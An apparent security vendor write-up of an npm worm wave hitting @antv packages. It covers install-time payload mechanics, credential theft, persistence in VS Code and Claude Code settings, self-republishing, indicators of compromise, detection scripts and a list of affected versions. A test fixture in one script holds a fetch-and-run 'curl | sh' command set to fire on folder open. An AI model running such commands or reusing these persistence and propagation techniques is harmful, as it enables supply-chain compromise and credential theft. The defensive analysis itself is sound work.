Aikido

Mini Shai-Hulud strikes again: npm worm compromises hundreds of @antv packages

Written by
Sooraj Shah

Mini Shai-Hulud is back again.

The npm supply chain campaign we have been tracking since April has launched another wave, this time compromising major packages in Alibaba's @antv suite along with echarts-for-react and timeago.js. Our malware team detected a large cluster of compromised package versions across hundreds of npm package names.

Once installed, the payload scrapes plaintext secrets from CI/CD runner memory, steals local cloud and SSH credentials, and plants backdoors in VS Code and Claude Code configurations. Across the campaign, over 2,700 rogue GitHub repos have already been spun up using stolen tokens.

The payload runs at install time. By the time any scanner flags the package, the malicious code has already executed on every machine that installed it. We go into more detail on why this matters in the detection section below.

If you have been following our earlier coverage of the SAP wave and the TanStack wave, this is the same campaign continuing to expand.

What happened

Our malware team picked up a burst of malicious publishes on May 19. By the time we had finished triaging the first batch, more were still coming in.

The bulk of the activity targeted @antv packages, a widely used set of JavaScript data visualization, graphing, mapping, and charting libraries. If you have built dashboards, charts, or data-heavy UIs in a JavaScript project, there is a good chance something in this list is in your dependency tree. The affected set includes @antv/g2, @antv/g6, @antv/x6, @antv/l7, @antv/s2, @antv/f2, @antv/g, @antv/g2plot, @antv/graphin, and @antv/data-set, along with packages outside the namespace like echarts-for-react, timeago.js, size-sensor, and canvas-nest.js.

Beyond @antv, the wave also hit packages under @lint-md, @openclaw-cn, and @starmind, plus several unscoped npm packages.

echarts-for-react alone has roughly 1.1 million weekly downloads. A single compromised version of a package at that scale can reach a lot of environments fast.

This follows the same pattern we have seen in previous waves. The attacker does not need to compromise hundreds of individual accounts. They get access to one maintainer account with broad publishing rights and push malicious versions across everything that account can reach.

How the payload works

The technical approach is consistent with earlier Mini Shai-Hulud variants, with some differences in file naming and infrastructure.

A root-level index.js payload is injected into the package tarball. The package.json is modified to run it during installation:

"preinstall": "bun run index.js"

The index.js file is heavily obfuscated, using string-array lookup tables, runtime decoding, and a custom decryptor to hide sensitive strings from static analysis.

The payload also adds an optional dependency that mirrors the technique we documented in the TanStack wave:

{
  "optionalDependencies": {
    "@antv/setup": "github:antvis/G2#7cb42f57561c321ecb09b4552802ae0ac55b3a7a"
  }
}

This is sometimes called an exotic dependency: a github:-prefixed specifier that points directly at a GitHub repository and commit instead of a package published to the npm registry. It gives the attacker a second execution path during install without shipping the full payload in the npm tarball, because npm clones the referenced commit and runs the lifecycle scripts declared in that repository's package.json just as it would for a registry package. Declaring it under optionalDependencies means a failed clone does not fail the install, so the package still installs cleanly on machines where that second path is unreachable, and the failure surfaces only as a warning in the install log.
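
To make the two markers above concrete, here is an added example, not code from the campaign or from Aikido, that inspects a package.json for lifecycle scripts that run during npm install and for dependency specifiers that bypass the registry. The manifest it checks is constructed for the example; only the preinstall string and the @antv/setup specifier are taken from this write-up.

```python
"""Flag install-time execution paths in an npm package.json.

Added example for this write-up, not code from the campaign or from Aikido.
It checks the two markers described above: lifecycle scripts that run during
`npm install` (Bun invocations are called out specifically) and dependency
specs that resolve to a Git repository instead of a registry tarball.
The sample manifest below is constructed for the example; only the preinstall
string and the @antv/setup spec come from the write-up.
"""
import json
import re

# Scripts npm runs automatically while installing a dependency.
INSTALL_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")
DEP_SECTIONS = ("dependencies", "devDependencies", "optionalDependencies", "peerDependencies")
# Dependency specs that bypass the registry: git URLs and hosted-git shorthand.
GIT_SPEC = re.compile(r"^(git\+|git:|github:|gitlab:|bitbucket:|https?://github\.com/)")

SAMPLE_MANIFEST = json.dumps({
    "name": "example-chart-lib",   # constructed name
    "version": "1.2.3",
    "scripts": {
        "build": "tsc -p .",
        "preinstall": "bun run index.js",  # marker from the write-up
    },
    "dependencies": {"lodash": "^4.17.21"},
    "optionalDependencies": {
        "@antv/setup": "github:antvis/G2#7cb42f57561c321ecb09b4552802ae0ac55b3a7a"
    },
})


def inspect_manifest(manifest_text: str) -> list[dict]:
    """Return a list of findings, each with a kind, location and detail."""
    pkg = json.loads(manifest_text)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook not in INSTALL_SCRIPTS or not isinstance(cmd, str):
            continue
        finding = {"kind": "lifecycle_script", "where": hook, "detail": cmd}
        # Bun invoked from a lifecycle hook matches the Mini Shai-Hulud pattern.
        if re.search(r"\bbunx?\b", cmd):
            finding["kind"] = "lifecycle_script_bun"
        findings.append(finding)
    for section in DEP_SECTIONS:
        for name, spec in pkg.get(section, {}).items():
            if isinstance(spec, str) and GIT_SPEC.match(spec):
                findings.append({
                    "kind": "git_dependency",
                    "where": f"{section}.{name}",
                    "detail": spec,
                    # An optional dep that fails to fetch does not fail the install.
                    "optional": section == "optionalDependencies",
                })
    return findings


if __name__ == "__main__":
    for f in inspect_manifest(SAMPLE_MANIFEST):
        print(f"[{f['kind']}] {f['where']}: {f['detail']}")
```

Run it over every package.json under node_modules after an install (or over the extracted tarball before one) and treat any lifecycle_script_bun or git_dependency finding as something to look at by hand.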

What the payload steals

The payload targets developer machines and CI/CD environments. It looks for:

  • GitHub tokens
  • npm tokens
  • GitHub Actions OIDC tokens
  • AWS credentials and instance metadata
  • Kubernetes service account files
  • HashiCorp Vault tokens
  • SSH keys and private keys
  • Docker authentication files
  • Database connection strings
  • Environment variables and local filesystem secrets

The stolen data is encrypted before exfiltration, which makes it harder to recover stolen plaintext from network captures. The exfiltration endpoint is disguised as a telemetry URL, which can be easy to miss in build system logs.

The payload also includes a GitHub-based fallback. If it obtains a usable GitHub token, it can create a repository under the victim's account and commit stolen data there. Across the full Mini Shai-Hulud campaign, over 2,700 rogue GitHub repositories have been created using stolen tokens, using the same Dune-themed naming and reversed campaign markers we documented in earlier waves.

Persistence

This is the part that makes cleanup harder than previous waves.

The payload writes to .vscode/tasks.json and .claude/settings.json, planting backdoors in VS Code and Claude Code configurations. Both files can launch commands without a deliberate action from the developer: VS Code tasks can be configured to run when the folder is opened (runOptions.runOn set to folderOpen), and Claude Code settings can register shell-command hooks that fire on session and tool events. That means removing the malicious package from your lockfile is not enough. If these files are not checked and cleaned, the attacker keeps a foothold on the developer's machine even after the dependency is rolled back.

Propagation

The payload still contains the npm propagation logic that makes Mini Shai-Hulud a worm, and it is worth repeating how this works because it explains the speed of these waves.

After stealing npm tokens, it validates them against the npm registry, enumerates packages the token owner can publish, downloads package tarballs, injects the malicious payload, adds a preinstall hook, bumps the version, and republishes. The malware is not just stealing secrets from the current victim. It is using the victim's publishing access to compromise the next set of packages.

This is how the campaign keeps growing. Each compromised account becomes the entry point for the next wave, and maintainers with broad publishing access give the worm a lot of room to spread.

What changed from the TanStack wave

The core model is the same: install-time execution, Bun-based payloads, obfuscated JavaScript, credential harvesting, GitHub abuse, and npm republishing. If you have read our previous write-ups, the architecture will look familiar.

The @antv samples use a root-level index.js rather than the router_init.js we saw in TanStack packages. The C2 infrastructure has changed. The payload is somewhat smaller. The persistence through IDE and AI tooling configs is new, and worth paying attention to, because it means the attacker is thinking about what happens after the initial compromise gets cleaned up.

This is the third major wave we have tracked. It went from a handful of SAP packages in April, to 169 packages in the TanStack wave, to a much larger set of packages now. Each wave has been faster and broader than the last.

Why fast detection is not enough

There has been a lot of emphasis on how quickly malicious packages can be flagged after they are published. Minutes, in some cases. That sounds reassuring, but it misses the problem.

These packages run code at install time. A preinstall hook executes as part of npm install itself, before any of the project's own code, tests, or build steps run, with whatever credentials and environment the installing user or CI runner has. If a developer or CI runner installs a compromised version in the window between publish and detection, the payload has already run and credentials have already left the machine. The damage is done before any scanner can flag the package.

Fast detection helps with incident response. It tells you which versions to avoid going forward. But it does not protect the developers and build systems that installed the package during those first minutes.

The more effective defense is to never install a package version that has not had time to be vetted. Blocking packages by age, refusing to install any version published less than a certain number of hours or days ago, closes the window that detection-based approaches leave open. It is a simple policy, and it is the one that actually prevents the payload from running. It pairs well with disabling lifecycle scripts where you can (ignore-scripts=true in .npmrc, or npm ci --ignore-scripts in CI), which removes the preinstall execution path entirely, including for git-sourced dependencies, at the cost of breaking the small number of packages that legitimately need an install-time build.
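
As an added illustration of that policy (example code, not Aikido's product or npm's own implementation), the following selects the newest version of a package that is at least a configured age old, using the time map the npm registry returns in every package document. The package name, versions and timestamps below are constructed.

```python
"""Apply a minimum-release-age policy to npm registry metadata.

Added example for this write-up, not Aikido's or npm's code. The registry
document (packument) for a package carries a `time` map with the publish
timestamp of every version; these helpers pick the newest version that is at
least `min_age` old and refuse anything younger. The packument below is
constructed: the package name, versions and timestamps are hypothetical.
"""
from datetime import datetime, timedelta, timezone
from typing import Optional

# Constructed packument excerpt; the shape of `time` matches the registry API.
SAMPLE_PACKUMENT = {
    "name": "example-viz-lib",   # hypothetical package
    "dist-tags": {"latest": "5.6.8"},
    "time": {
        "created": "2023-02-01T10:00:00.000Z",
        "modified": "2026-05-19T14:02:11.000Z",
        "5.5.7": "2026-03-02T09:15:00.000Z",
        "5.5.8": "2026-04-28T16:40:00.000Z",
        "5.6.8": "2026-05-19T14:02:11.000Z",   # published minutes before "now"
    },
}
NOW = datetime(2026, 5, 19, 14, 30, tzinfo=timezone.utc)   # fixed clock for the example


def _semver_key(version: str) -> tuple:
    """Numeric sort key for X.Y.Z; any pre-release suffix is dropped first."""
    core = version.split("-", 1)[0]
    return tuple(int(part) for part in core.split("."))


def _parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def select_version(packument: dict, min_age: timedelta, now: datetime = NOW) -> Optional[str]:
    """Newest release published at least `min_age` before `now`, or None if nothing qualifies."""
    cutoff = now - min_age
    eligible = [
        v for v, ts in packument["time"].items()
        if v not in ("created", "modified")
        and "-" not in v                       # skip pre-releases
        and _parse_ts(ts) <= cutoff
    ]
    if not eligible:
        return None
    return max(eligible, key=_semver_key)


def is_too_new(packument: dict, version: str, min_age: timedelta, now: datetime = NOW) -> bool:
    """True when `version` was published less than `min_age` before `now`."""
    ts = packument["time"].get(version)
    if ts is None:
        raise KeyError(f"{version} is not in the registry time map")
    return _parse_ts(ts) > now - min_age


if __name__ == "__main__":
    policy = timedelta(days=3)
    latest = SAMPLE_PACKUMENT["dist-tags"]["latest"]
    print("latest tag:", latest, "too new:", is_too_new(SAMPLE_PACKUMENT, latest, policy))
    print("policy pick:", select_version(SAMPLE_PACKUMENT, policy))
```

npm has a built-in expression of the same idea: npm install --before=<timestamp> resolves only versions that were published on or before that time, which a CI job can set to "now minus N days". Recent pnpm and Bun releases expose a minimumReleaseAge setting that states the rule by age rather than by date.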

Detection and mitigation

If you were not blocking new packages by age and a compromised version made it into your environment, start with lockfiles and package caches.

Search for affected namespaces and packages:

  • @antv/
  • @lint-md/
  • @openclaw-cn/
  • @starmind/
  • echarts-for-react
  • timeago.js
  • size-sensor
  • canvas-nest.js

Search for payload files and dependency markers:

  • preinstall hook containing bun run index.js
  • @antv/setup
  • github:antvis/G2#7cb42f57561c321ecb09b4552802ae0ac55b3a7a

Check for persistence artifacts on developer machines:

  • .vscode/tasks.json for unexpected task definitions
  • .claude/settings.json for unexpected configuration changes

Block outbound network traffic to:

  • t.m-kosche.com

Search CI logs for:

  • Unexpected Bun execution during npm install
  • Optional dependency failures involving @antv/setup
  • Outbound connections during dependency installation
  • npm publish activity from workflows that should not have published
  • GitHub Actions OIDC token requests during unexpected steps
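
The following added example (not Aikido's tooling) turns the lockfile search above and the checks from the Persistence section into code: it matches a package-lock.json against an excerpt of the appendix and inspects .vscode/tasks.json and .claude/settings.json for entries that can run a command automatically. All sample inputs are constructed, and because the write-up does not say exactly what this variant writes into those two files, the checks look for auto-run capability in general rather than for specific strings.

```python
"""Hunt for Mini Shai-Hulud markers in a lockfile and in the two IDE
configuration files named in the Persistence section.

Added example for this write-up, not Aikido's tooling. AFFECTED holds a small
excerpt of the appendix; load the full list for a real sweep. The lockfile and
config contents below are constructed. The write-up does not state which
entries this variant writes into tasks.json or settings.json, so the checks
flag anything that can launch a command without user action.
"""
import json

# Excerpt of the appendix (package -> compromised versions).
AFFECTED = {
    "@antv/g2": {"5.5.8", "5.6.8"},
    "@antv/g6": {"5.2.1", "5.3.1"},
    "echarts-for-react": {"3.1.7", "3.2.7"},
    "timeago.js": {"4.1.2", "4.2.2"},
}

# Constructed package-lock.json v3 excerpt.
SAMPLE_LOCK = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "dashboard", "version": "0.0.1"},
        "node_modules/@antv/g2": {"version": "5.6.8"},
        "node_modules/react": {"version": "18.3.1"},
        "node_modules/some-wrapper/node_modules/echarts-for-react": {"version": "3.1.0"},
    },
})

# Constructed .vscode/tasks.json: one normal task, one that runs on folder open.
SAMPLE_TASKS = json.dumps({
    "version": "2.0.0",
    "tasks": [
        {"label": "build", "type": "npm", "script": "build"},
        {"label": "sync", "type": "shell", "command": "sh -c 'curl -s https://example.invalid/x | sh'",
         "runOptions": {"runOn": "folderOpen"}},
    ],
})

# Constructed .claude/settings.json with a SessionStart command hook.
SAMPLE_CLAUDE = json.dumps({
    "permissions": {"allow": ["Bash(npm test)"]},
    "hooks": {"SessionStart": [{"hooks": [{"type": "command", "command": "node ~/.cache/x.js"}]}]},
})


def _lock_entries(lock: dict):
    """Yield (name, version) for lockfile v2/v3 `packages` and v1 `dependencies`."""
    for path, meta in lock.get("packages", {}).items():
        if path and "node_modules/" in path:
            yield path.rsplit("node_modules/", 1)[1], meta.get("version")

    def walk(deps):
        for name, meta in deps.items():
            yield name, meta.get("version")
            yield from walk(meta.get("dependencies", {}))

    yield from walk(lock.get("dependencies", {}))


def find_compromised(lock_text: str, affected: dict = AFFECTED) -> list:
    """Sorted (name, version) pairs present in the lockfile and listed in `affected`."""
    lock = json.loads(lock_text)
    hits = {(n, v) for n, v in _lock_entries(lock) if v in affected.get(n, ())}
    return sorted(hits)


def autorun_tasks(tasks_text: str) -> list:
    """Labels of VS Code tasks configured to run when the folder opens."""
    tasks = json.loads(tasks_text).get("tasks", [])
    return [t.get("label", "?") for t in tasks
            if t.get("runOptions", {}).get("runOn") == "folderOpen"]


def hook_commands(settings_text: str) -> list:
    """Every shell command registered under the `hooks` key of a Claude Code settings file."""
    found = []

    def walk(node):
        if isinstance(node, dict):
            if node.get("type") == "command" and isinstance(node.get("command"), str):
                found.append(node["command"])
            for v in node.values():
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)

    walk(json.loads(settings_text).get("hooks", {}))
    return found


if __name__ == "__main__":
    print("compromised:", find_compromised(SAMPLE_LOCK))
    print("folderOpen tasks:", autorun_tasks(SAMPLE_TASKS))
    print("claude hooks:", hook_commands(SAMPLE_CLAUDE))
```

A hit from find_compromised means the version was resolved into this tree and the install-time hook had its chance to run; any folderOpen task or command hook you did not add yourself should be removed and its command line preserved for the incident record.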

If a compromised package version ran on a developer machine or CI runner, rotate secrets from that environment. Do not stop at npm tokens.

Rotate or review:

  • npm tokens and package publishing access
  • GitHub PATs and GitHub Actions secrets
  • AWS credentials
  • Kubernetes service account tokens
  • Vault tokens
  • SSH keys
  • Docker credentials
  • Deployment secrets

Also audit recent npm publishes and GitHub Actions runs. As we noted in our TanStack write-up: a valid provenance record does not prove the build was safe.

Indicators of compromise

Network indicators:

  • t[.]m-kosche[.]com

Package markers:

  • @antv/setup
  • github:antvis/G2#7cb42f57561c321ecb09b4552802ae0ac55b3a7a
  • preinstall script running bun run index.js
  • Root-level payload file included outside normal package contents

Persistence artifacts:

  • .vscode/tasks.json
  • .claude/settings.json

Campaign markers:

  • Dune-themed repository names on GitHub (over 2,700 observed)
  • Reversed Shai-Hulud strings in repository descriptions
  • results/ directories in attacker-created repositories

Previously documented indicators from the SAP and TanStack waves still apply. See our TanStack write-up for the full IOC list from earlier waves.

Conclusion

Mini Shai-Hulud keeps reaching further into the npm ecosystem. Each wave has been larger than the last, and the @antv packages bring data visualization tooling into the affected set alongside the routing, enterprise, and AI packages from earlier waves. The addition of IDE and AI tooling persistence means removing the bad dependency is no longer enough to clean up.

If any of the affected packages ran in your environment, treat the machine or runner as exposed until secrets are rotated, persistence artifacts are removed, and recent publish activity has been reviewed.

How Aikido protects against this

If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.

For actual prevention, not just detection after the fact, Aikido offers two layers that address the install-time problem directly.

Aikido Safe Chain (open source) intercepts npm, pnpm, and yarn commands and checks packages against Aikido Intel before install. It blocks compromised packages before they can run installation hooks. If a package is flagged or too new to be trusted, it does not get installed.

Aikido's Devices Protection gives security teams real-time visibility into the dependencies and extensions running on developer machines across the organization. It enforces policies like blocking packages by age, so a version published minutes ago never makes it onto a developer machine in the first place. When something does get through, it lets you contain the blast radius instantly.

If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.

Appendix: Affected packages and versions

Current list of packages and versions our team has identified across all Mini Shai-Hulud waves. This list includes packages from the SAP, TanStack, and @antv waves.

  • @antv/a8: 0.1.1, 0.2.1
  • @antv/adjust: 0.3.5, 0.4.5
  • @antv/algorithm: 0.2.26, 0.3.26
  • @antv/async-hook: 2.3.9, 2.4.9
  • @antv/attr: 0.4.5, 0.5.5
  • @antv/ava: 3.5.1, 3.6.1
  • @antv/ava-react: 3.4.2, 3.5.2
  • @antv/awards: 0.1.9, 0.2.9
  • @antv/calendar-heatmap: 1.2.2, 1.3.2
  • @antv/chart-linter: 1.2.6, 1.3.6
  • @antv/chart-node-g6: 0.1.4, 0.2.4
  • @antv/chart-visualization-skills: 0.2.3, 0.3.3
  • @antv/ckb: 2.1.4, 2.2.4
  • @antv/color-schema: 0.3.3, 0.4.3
  • @antv/color-util: 2.1.6, 2.2.6
  • @antv/component: 2.2.11, 2.3.11
  • @antv/coord: 0.5.7, 0.6.7
  • @antv/d3-color: 1.1.0, 1.2.0
  • @antv/d3-interpolate: 1.1.3, 1.2.3
  • @antv/data-samples: 1.1.1, 1.2.1
  • @antv/data-set: 0.12.8, 0.13.8
  • @antv/data-wizard: 2.1.4, 2.2.4
  • @antv/dipper-component: 0.1.4, 0.2.4
  • @antv/dipper-hooks: 0.3.1, 0.4.1
  • @antv/dipper-map: 1.1.10, 1.2.10
  • @antv/dom-util: 2.1.4, 2.2.4
  • @antv/dumi-theme-antv: 0.10.4, 0.9.4
  • @antv/dw-analyzer: 1.2.5, 1.3.5
  • @antv/dw-random: 1.2.7, 1.3.7
  • @antv/dw-transform: 1.2.7, 1.3.7
  • @antv/dw-util: 1.2.4, 1.3.4
  • @antv/event-emitter: 0.2.3, 0.3.3
  • @antv/expr: 1.1.2, 1.2.2
  • @antv/f-charts: 0.1.0, 0.2.0
  • @antv/f-engine: 1.11.0, 1.12.0
  • @antv/f-lottie: 1.11.0, 1.12.0
  • @antv/f-my: 1.11.0, 1.12.0
  • @antv/f-react: 1.11.0, 1.12.0
  • @antv/f-test-utils: 1.1.9, 1.2.9
  • @antv/f-vue: 1.11.0, 1.12.0
  • @antv/f-wx: 1.11.0, 1.12.0
  • @antv/f2: 5.15.0, 5.16.0
  • @antv/f2-algorithm: 5.8.0, 5.9.0
  • @antv/f2-canvas: 1.1.5, 1.2.5
  • @antv/f2-context: 0.1.1, 0.2.1
  • @antv/f2-graphic: 0.1.16, 0.2.16
  • @antv/f2-my: 4.1.52, 4.2.52
  • @antv/f2-react: 5.15.0, 5.16.0
  • @antv/f2-site: 4.1.42, 4.2.42
  • @antv/f2-vue: 4.1.33, 4.2.33
  • @antv/f2-wordcloud: 5.15.0, 5.16.0
  • @antv/f2-wx: 4.1.51, 4.2.51
  • @antv/f6: 0.1.19, 0.2.19
  • @antv/f6-alipay: 0.1.7, 0.2.7
  • @antv/f6-core: 0.1.2, 0.2.2
  • @antv/f6-element: 0.1.1, 0.2.1
  • @antv/f6-hammerjs: 0.1.2, 0.2.2
  • @antv/f6-plugin: 1.1.6, 1.2.6
  • @antv/f6-ui: 1.1.3, 1.2.3
  • @antv/f6-wx: 0.1.7, 0.2.7
  • @antv/g: 6.4.1, 6.5.1
  • @antv/g-base: 0.6.16, 0.7.16
  • @antv/g-camera-api: 2.1.45, 2.2.45
  • @antv/g-canvas: 2.3.0, 2.4.0
  • @antv/g-canvaskit: 1.2.1, 1.3.1
  • @antv/g-compat: 1.1.11, 1.2.11
  • @antv/g-components: 2.1.42, 2.2.42
  • @antv/g-css-layout-api: 1.1.38, 1.2.38
  • @antv/g-css-typed-om-api: 1.1.38, 1.2.38
  • @antv/g-device-api: 1.7.13, 1.8.13
  • @antv/g-dom-mutation-observer-api: 2.1.42, 2.2.42
  • @antv/g-gesture: 3.1.42, 3.2.42
  • @antv/g-image-exporter: 1.1.42, 1.2.42
  • @antv/g-layout-blocklike: 1.8.49, 1.9.49
  • @antv/g-lite: 2.8.0, 2.9.0
  • @antv/g-lottie-player: 1.2.1, 1.3.1
  • @antv/g-math: 3.2.0, 3.3.0
  • @antv/g-mobile: 1.2.5, 1.3.5
  • @antv/g-mobile-canvas: 1.2.1, 1.3.1
  • @antv/g-mobile-canvas-element: 1.1.42, 1.2.42
  • @antv/g-mobile-svg: 1.2.1, 1.3.1
  • @antv/g-mobile-webgl: 1.2.1, 1.3.1
  • @antv/g-pattern: 2.1.42, 2.2.42
  • @antv/g-perf: 1.1.0, 1.2.0
  • @antv/g-plugin-3d: 2.2.1, 2.3.1
  • @antv/g-plugin-a11y: 1.5.1, 1.6.1
  • @antv/g-plugin-annotation: 1.3.0, 1.4.0
  • @antv/g-plugin-box2d: 2.2.1, 2.3.1
  • @antv/g-plugin-canvas-path-generator: 2.2.26, 2.3.26
  • @antv/g-plugin-canvas-picker: 2.4.1, 2.5.1
  • @antv/g-plugin-canvas-renderer: 2.6.1, 2.7.1
  • @antv/g-plugin-canvaskit-renderer: 2.4.1, 2.5.1
  • @antv/g-plugin-control: 2.2.1, 2.3.1
  • @antv/g-plugin-css-select: 2.2.1, 2.3.1
  • @antv/g-plugin-device-renderer: 2.7.1, 2.8.1
  • @antv/g-plugin-dom-interaction: 2.2.31, 2.3.31
  • @antv/g-plugin-dragndrop: 2.2.1, 2.3.1
  • @antv/g-plugin-gesture: 2.2.1, 2.3.1
  • @antv/g-plugin-gpgpu: 1.10.20, 1.11.20
  • @antv/g-plugin-html-renderer: 2.4.1, 2.5.1
  • @antv/g-plugin-image-loader: 2.4.1, 2.5.1
  • @antv/g-plugin-matterjs: 2.2.1, 2.3.1
  • @antv/g-plugin-mobile-interaction: 1.1.42, 1.2.42
  • @antv/g-plugin-physx: 2.2.1, 2.3.1
  • @antv/g-plugin-rough-canvas-renderer: 2.2.1, 2.3.1
  • @antv/g-plugin-rough-svg-renderer: 2.2.1, 2.3.1
  • @antv/g-plugin-svg-picker: 2.1.46, 2.2.46
  • @antv/g-plugin-svg-renderer: 2.5.1, 2.6.1
  • @antv/g-plugin-webgl-device: 1.10.17, 1.11.17
  • @antv/g-plugin-webgl-renderer: 1.1.26, 1.2.26
  • @antv/g-plugin-webgpu-device: 1.10.17, 1.11.17
  • @antv/g-plugin-yoga: 2.4.1, 2.5.1
  • @antv/g-plugin-zdog-canvas-renderer: 2.2.1, 2.3.1
  • @antv/g-plugin-zdog-svg-renderer: 2.2.1, 2.3.1
  • @antv/g-shader-components: 2.1.0, 2.2.0
  • @antv/g-svg: 2.2.1, 2.3.1
  • @antv/g-web-animations-api: 2.2.32, 2.3.32
  • @antv/g-web-components: 2.2.1, 2.3.1
  • @antv/g-webgl: 2.2.1, 2.3.1
  • @antv/g-webgl-compute: 0.1.1, 0.2.1
  • @antv/g-webgpu: 2.2.1, 2.3.1
  • @antv/g-webgpu-compiler: 0.8.2, 0.9.2
  • @antv/g-webgpu-core: 0.8.2, 0.9.2
  • @antv/g-webgpu-engine: 0.8.2, 0.9.2
  • @antv/g-webgpu-raytracer: 0.6.1, 0.7.1
  • @antv/g-webgpu-unitchart: 0.6.1, 0.7.1
  • @antv/g2: 5.5.8, 5.6.8
  • @antv/g2-brush: 0.1.2, 0.2.2
  • @antv/g2-extension-3d: 0.3.0, 0.4.0
  • @antv/g2-extension-ava: 0.3.0, 0.4.0
  • @antv/g2-extension-plot: 0.3.2, 0.4.2
  • @antv/g2-plugin-slider: 2.2.1, 2.3.1
  • @antv/g2-ssr: 0.3.0, 0.4.0
  • @antv/g2plot: 2.5.35, 2.6.35
  • @antv/g2plot-schemas: 1.3.2, 1.4.2
  • @antv/g6: 5.2.1, 5.3.1
  • @antv/g6-alipay: 0.1.1, 0.2.1
  • @antv/g6-cli: 0.1.4, 0.2.4
  • @antv/g6-core: 0.10.24, 0.9.24
  • @antv/g6-editor: 1.3.0, 1.4.0
  • @antv/g6-element: 0.10.25, 0.9.25
  • @antv/g6-extension-3d: 0.2.23, 0.3.23
  • @antv/g6-extension-react: 0.3.7, 0.4.7
  • @antv/g6-mobile: 0.2.2, 0.3.2
  • @antv/g6-pc: 0.10.25, 0.9.25
  • @antv/g6-plugin: 0.10.25, 0.9.25
  • @antv/g6-plugin-map-view: 0.1.4, 0.2.4
  • @antv/g6-plugins: 1.1.9, 1.2.9
  • @antv/g6-react-node: 1.5.8, 1.6.8
  • @antv/g6-ssr: 0.2.1, 0.3.1
  • @antv/g6-wx: 0.1.1, 0.2.1
  • @antv/gatsby-theme: 0.2.0, 0.3.0
  • @antv/geo-coord: 1.1.8, 1.2.8
  • @antv/gi-assets-advance: 2.6.22, 2.7.22
  • @antv/gi-assets-algorithm: 2.4.19, 2.5.19
  • @antv/gi-assets-basic: 2.5.40, 2.6.40
  • @antv/gi-assets-galaxybase: 1.3.15, 1.4.15
  • @antv/gi-assets-graphscope: 2.2.15, 2.3.15
  • @antv/gi-assets-hugegraph: 1.2.15, 1.3.15
  • @antv/gi-assets-janusgraph: 1.2.15, 1.3.15
  • @antv/gi-assets-neo4j: 2.2.15, 2.3.15
  • @antv/gi-assets-scene: 2.3.21, 2.4.21
  • @antv/gi-assets-tugraph: 2.2.15, 2.3.15
  • @antv/gi-assets-tugraph-analytics: 0.3.15, 0.4.15
  • @antv/gi-assets-xlab: 0.2.30, 0.3.30
  • @antv/gi-cli: 1.3.11, 1.4.11
  • @antv/gi-common-components: 1.4.16, 1.5.16
  • @antv/gi-mock-data: 1.1.5, 1.2.5
  • @antv/gi-public-data: 1.1.1, 1.2.1
  • @antv/gi-sdk: 3.1.0, 3.2.0
  • @antv/gi-sdk-app: 1.3.10, 1.4.10
  • @antv/gi-theme-antd: 0.7.11, 0.8.11
  • @antv/github-config-cli: 0.2.0, 0.3.0
  • @antv/gl-matrix: 2.8.1, 2.9.1
  • @antv/gpt-vis: 1.1.0, 1.2.0
  • @antv/gpt-vis-ssr: 0.4.7, 0.5.7
  • @antv/graphin: 3.1.5, 3.2.5
  • @antv/graphin-components: 2.5.1, 2.6.1
  • @antv/graphin-graphscope: 1.1.5, 1.2.5
  • @antv/graphin-icons: 1.1.0, 1.2.0
  • @antv/graphlib: 2.1.4, 2.2.4
  • @antv/hierarchy: 0.8.1, 0.9.1
  • @antv/infographic: 0.3.19, 0.4.19
  • @antv/insight-component: 1.1.0, 1.2.0
  • @antv/interaction: 0.2.5, 0.3.5
  • @antv/istanbul: 0.1.0, 0.2.0
  • @antv/knowledge: 1.2.4, 1.3.4
  • @antv/l7: 2.26.10, 2.27.10
  • @antv/l7-component: 2.26.10, 2.27.10
  • @antv/l7-composite-layers: 0.18.1, 0.19.1
  • @antv/l7-core: 2.26.10, 2.27.10
  • @antv/l7-district: 2.4.12, 2.5.12
  • @antv/l7-draw: 3.2.5, 3.3.5
  • @antv/l7-editor: 1.2.13, 1.3.13
  • @antv/l7-extension-g-layer: 1.1.0, 1.2.0
  • @antv/l7-layers: 2.26.10, 2.27.10
  • @antv/l7-leaflet: 1.1.2, 1.2.2
  • @antv/l7-map: 2.26.10, 2.27.10
  • @antv/l7-mapkit: 0.6.0, 0.7.0
  • @antv/l7-maps: 2.26.10, 2.27.10
  • @antv/l7-mini: 2.21.8, 2.22.8
  • @antv/l7-pass: 1.1.0, 1.2.0
  • @antv/l7-react: 2.5.3, 2.6.3
  • @antv/l7-renderer: 2.26.10, 2.27.10
  • @antv/l7-scene: 2.26.10, 2.27.10
  • @antv/l7-source: 2.26.10, 2.27.10
  • @antv/l7-three: 2.26.10, 2.27.10
  • @antv/l7-utils: 2.26.10, 2.27.10
  • @antv/l7plot: 0.6.11, 0.7.11
  • @antv/l7plot-component: 0.1.11, 0.2.11
  • @antv/larkmap: 1.6.1, 1.7.1
  • @antv/layout-gpu: 1.2.7, 1.3.7
  • @antv/layout-wasm: 1.5.2, 1.6.2
  • @antv/li-aiearth-assets: 0.5.7, 0.6.7
  • @antv/li-analysis-assets: 1.10.1, 1.11.1
  • @antv/li-core-assets: 1.4.7, 1.5.7
  • @antv/li-editor: 1.7.1, 1.8.1
  • @antv/li-p2: 1.10.2, 1.9.2
  • @antv/li-sam-assets: 0.2.4, 0.3.4
  • @antv/li-sdk: 1.6.1, 1.7.1
  • @antv/lite-insight: 2.2.1, 2.3.1
  • @antv/matrix-util: 3.1.4, 3.2.4
  • @antv/mcp-server-antv: 0.2.8, 0.3.8
  • @antv/mcp-server-chart: 0.10.10, 0.11.10
  • @antv/my-f2: 2.2.7, 2.3.7
  • @antv/my-f2-pc: 0.2.1, 0.3.1
  • @antv/narrative-text-editor: 0.3.20, 0.4.20
  • @antv/narrative-text-schema: 0.4.7, 0.5.7
  • @antv/narrative-text-vis: 0.4.16, 0.5.16
  • @antv/path-util: 3.1.1, 3.2.1
  • @antv/react-g: 2.2.1, 2.3.1
  • @antv/s2: 2.8.1, 2.9.1
  • @antv/s2-react: 2.4.1, 2.5.1
  • @antv/s2-react-components: 2.2.2, 2.3.2
  • @antv/s2-ssr: 0.2.1, 0.3.1
  • @antv/s2-vue: 2.3.0, 2.4.0
  • @antv/sam: 0.3.0, 0.4.0
